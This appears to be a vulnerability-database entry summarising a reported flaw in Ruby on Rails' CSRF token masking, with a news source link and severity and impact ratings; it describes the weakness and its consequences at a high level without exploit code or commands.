On April 26, 2025, security experts disclosed a critical flaw in Ruby on Rails’ CSRF protection mechanism that effectively nullifies the framework’s primary defence against cross-site request forgery attacks. By concatenating the one-time pad (OTP) with the XOR-encrypted token, Rails inadvertently exposed the very key needed to reconstruct valid CSRF tokens, allowing attackers to forge requests seamlessly. This vulnerability affects every current Rails release and all versions dating back to the 2022/2023 “fix,” placing thousands of web applications at risk. Malicious actors can exploit the flaw to perform unauthorized actions—such as changing user passwords, transferring funds, or exfiltrating sensitive data—on behalf of authenticated users without their knowledge. The failure of this core security layer not only threatens customer privacy but also opens avenues for large-scale data leakage, fraudulent transactions, and significant reputational damage for organizations relying on Rails. Immediate patching and token-masking redesign are essential to prevent widespread compromise of personal and financial information across the Rails ecosystem.
Source: https://cybersecuritynews.com/ruby-on-rails-vulnerability/
"id": "rub300050125",
"linkid": "ruby-on-rails-org",
"type": "Vulnerability",
"date": "5/2025",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"